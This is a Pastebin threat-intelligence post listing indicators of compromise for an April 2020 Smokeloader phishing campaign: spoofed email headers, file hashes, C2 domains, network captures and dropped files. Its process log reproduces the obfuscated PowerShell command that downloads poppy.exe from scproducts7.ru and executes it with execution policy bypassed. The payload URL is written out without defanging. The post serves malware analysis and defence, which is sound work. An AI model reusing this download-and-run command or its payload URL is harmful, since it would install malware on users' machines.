Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #IOC #OptiData #VR #smokeloader #LZH #WSH #vmdetect
- https://pastebin.com/EagNZxKf
- previous_contact:
- https://pastebin.com/QpG70u8T
- https://pastebin.com/BJzcXqkK
- https://pastebin.com/kBW7nkZ5
- https://pastebin.com/Z7zq0YkW
- https://pastebin.com/b8PkhMyN
- https://pastebin.com/hkskwKvc
- https://pastebin.com/JmthzrL4
- https://pastebin.com/1scwT0f8
- https://pastebin.com/MP3kCSSh
- FAQ:
- https://radetskiy.wordpress.com/2018/10/19/ioc_smokeloader_111018/
- https://research.checkpoint.com/2019-resurgence-of-smokeloader/
- attack_vector
- --------------
- email attach .RAR (LHa/LZH) > JS > WSH > PowerShell > GET 1URL > exe
- email_headers
- --------------
- Received: from hosting.wildpark.net (hosting.wildpark.net [217.77.208.228])
- Received: from [127.0.0.1] (unknown [148.251.234.93])
- by hosting.wildpark.net (Postfix) with ESMTPA id 7C920200037A
- Reply-To: gpnotorg@protonmail.com
- From: dpssmykolayiv@dpssmk.gov.ua
- Subject: Re: Задержка по оплате
- Message-Id: <1BA02550-FD75-EE8F-008E-A3B99C8754AE@dpssmk.gov.ua>
- Date: Tue, 7 Apr 2020 05:10:22 +0300
- X-Mailer: iPhone Mail (13E238)
- X-FEAS-CLIENT-IP: 217.77.208.228
- Return-Path: dpssmykolayiv@dpssmk.gov.ua
- files
- --------------
- SHA-256 9ace214924c5edd5a0f2b81a6798a264d92f79f0b30479b821ba3af9a24a422e
- File name План від 05.04.2020р.rar [ LHa (2.x)/LHark archive data [lh7] - header level 0 ]
- File size 6.69 KB (6852 bytes)
- SHA-256 cf99abc48e39374b48d9729f7efdf4d3aeaf93ce9011708c8cf6a2f939b99854
- File name pax_05.04.2020à..js [ JavaScript ]
- File size 19.80 KB (20278 bytes)
- SHA-256 4a77f5a9c0c331f53178518cab3e24b4bdb2c230c50ac16d5d917f73ebe8e51b
- File name poppy.exe [PE32 executable for MS Windows (GUI) Intel 80386 32-bit]
- File size 147.00 KB (150528 bytes)
- SHA-256 8d16d5caad71aaaaa1479f8477d2928b66581c79932a49a21edf93db2803ab9c
- File name 9419.tmp (ntdll.dll) [clean, droped to %temp%, Microsoft Visual C++ vx.x DLL ]
- File size 1.23 MB (1292192 bytes)
- activity
- **************
- PL_SCR http://scproducts7.ru/availableupdatemanager/poppy.exe
- C2 amfibiyapolyakova{.} com - thnx for @JAMESWT_MHT
- amfibiyapolyakova{.} com - sinkholed (CyS Centrum)
- siciliyaopartion{.} ru - sinkholed (CyS Centrum)
- opetileon{.} ru - sinkholed (CyS Centrum)
- crocopexpire{.} ug - sinkholed (CyS Centrum)
- yamaha{.} ug - sinkholed (CyS Centrum)
- informatioshopname{.} ru - thnx for CyS Centrum
- netwrk
- --------------
- [http]
- 8.208.91.58 scproducts7.ru GET /availableupdatemanager/poppy.exe HTTP/1.1 Google Chrome
- (!) !This program cannot be run in DOS mode.
- 185.14.31.88 amfibiyapolyakova.com POST / HTTP/1.1 (application/x-www-form-urlencoded) Mozilla/5.0
- [ssl]
- 204.79.197.200 www.bing.com Client Hello
- comp
- --------------
- powershell.exe 8.208.91.58 scproducts7.ru
- explorer.exe 185.14.31.88 amfibiyapolyakova.com
- proc
- --------------
- C:\Windows\System32\WScript.exe" "C:\Users\operator\Desktop\pax_05.04.2020à..js
- C:\Windows\System32\cmd.exe" /c iwbDyExnfhFHuWV & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://scproducts7.ru/availableupdatemanager/poppy.exe','%temp%WHk58.exe'); & %temp%WHk58.exe & CXorbhFlHAGsKcP
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowErshelL.eXe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://scproducts7.ru/availableupdatemanager/poppy.exe','C:\tmpWHk58.exe');
- C:\tmpWHk58.exe
- persist
- --------------
- n/a
- drop
- --------------
- C:\tmpWHk58.exe
- %temp%\9419.tmp
- %temp%\se3mut05.g01.ps1
- %temp%\nsfka0oj.3qd.psm1
- C:\Users\operator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
- # # #
- https://www.virustotal.com/gui/file/9ace214924c5edd5a0f2b81a6798a264d92f79f0b30479b821ba3af9a24a422e/details
- https://www.virustotal.com/gui/file/cf99abc48e39374b48d9729f7efdf4d3aeaf93ce9011708c8cf6a2f939b99854/details
- https://www.virustotal.com/gui/file/4a77f5a9c0c331f53178518cab3e24b4bdb2c230c50ac16d5d917f73ebe8e51b/details
- https://analyze.intezer.com/#/analyses/2ad8aa89-9449-4ea1-80d3-e2513c1ff7f6
- VR
- @
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement